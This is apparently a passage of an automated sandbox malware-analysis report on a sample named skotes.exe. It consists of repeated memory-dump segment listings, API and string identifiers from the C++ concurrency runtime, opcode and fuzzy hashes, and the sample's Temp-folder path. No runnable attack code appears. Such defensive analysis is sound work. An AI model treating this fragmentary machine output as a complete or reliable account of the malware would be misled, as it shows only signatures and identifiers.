                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                • String ID: pContext
                                                                                                                • API String ID: 3390424672-2046700901
                                                                                                                • Opcode ID: a324c1149ac5a36692d32f95a2fb29f216d9904d04c3bc731c9f1f5552619d08
                                                                                                                • Instruction ID: 9a1feb140c7cda0bcde6e6400c97c70f09f34c141446306c7af535c9c227bf2c
                                                                                                                • Opcode Fuzzy Hash: a324c1149ac5a36692d32f95a2fb29f216d9904d04c3bc731c9f1f5552619d08
                                                                                                                • Instruction Fuzzy Hash: E021F431B00615DBCB15AB68D8A9BFDB3B9BF94334BC4412AE401872D1CFACAC51CAD0
                                                                                                                Strings
                                                                                                                • 6{, xrefs: 007BE034
                                                                                                                • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 007BDFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6{$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                • API String ID: 0-1176861032
                                                                                                                • Opcode ID: 9a42ad3a869bb7de57b73cf27fd34ac58c925adb8694ed584f9d2d47cf922b21
                                                                                                                • Instruction ID: a7ad2c90a717b05dc7c7eb0e795ef83513fea01e88930e2f12484c13f768653e
                                                                                                                • Opcode Fuzzy Hash: 9a42ad3a869bb7de57b73cf27fd34ac58c925adb8694ed584f9d2d47cf922b21
                                                                                                                • Instruction Fuzzy Hash: B7219D71604209AFAB34BE758C84FEB77ADEF403647204614F82996351EBA8EC1087A1
                                                                                                                APIs
                                                                                                                • List.LIBCONCRT ref: 007AAEEA
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007AAF0F
                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 007AAF4E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                • String ID: pExecutionResource
                                                                                                                • API String ID: 1772865662-359481074
                                                                                                                • Opcode ID: c2a10eabdfc0876d7ddd434625db07947a056fab69e436c3fa71a598b0bb948d
                                                                                                                • Instruction ID: 824125647571bb127d4e16e2eaf7fd578027961243c435145079791aa2967e60
                                                                                                                • Opcode Fuzzy Hash: c2a10eabdfc0876d7ddd434625db07947a056fab69e436c3fa71a598b0bb948d
                                                                                                                • Instruction Fuzzy Hash: 8121A7B1641205EBCF18EF54C856BADB7B5BF88310F10402DF505AB282DBB8AE04CB95
                                                                                                                APIs
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A4F24
                                                                                                                • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 007A4F66
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                • String ID: count$ppVirtualProcessorRoots
                                                                                                                • API String ID: 2663199487-3650809737
                                                                                                                • Opcode ID: c9e8c3ab21990e3d8c07b78b5fbbf911312c6aa15f684d6e1c0e5180a45064ac
                                                                                                                • Instruction ID: 2435d7b70fd3f79248dbe165fb8558ce63d90eb46041c3e646cc3ceb3ca04021
                                                                                                                • Opcode Fuzzy Hash: c9e8c3ab21990e3d8c07b78b5fbbf911312c6aa15f684d6e1c0e5180a45064ac
                                                                                                                • Instruction Fuzzy Hash: 7821F535600115EFCF14EF98C895EAD77B5FF89310F00412AF5069B692DB7AAE01CB91
                                                                                                                APIs
                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007ABA0E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                • API String ID: 348560076-3997890769
                                                                                                                • Opcode ID: 6c111162fd543e964c0829c28c0276606e8089e01b1ff33cc557a783fabc3a3e
                                                                                                                • Instruction ID: c6036a887922fb174b3afec2b99ad29ec2a84d0bd6d560ba1e59b0c012674590
                                                                                                                • Opcode Fuzzy Hash: 6c111162fd543e964c0829c28c0276606e8089e01b1ff33cc557a783fabc3a3e
                                                                                                                • Instruction Fuzzy Hash: 0401F9B0692355E9D71877755C0DBAB369C9F42304F60592DE580EB282EF7DD80046A5
                                                                                                                APIs
                                                                                                                • SafeRWList.LIBCONCRT ref: 007A6E73
                                                                                                                  • Part of subcall function 007A4E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 007A4E7F
                                                                                                                  • Part of subcall function 007A4E6E: List.LIBCMT ref: 007A4E89
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A6E85
                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007A6EAA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
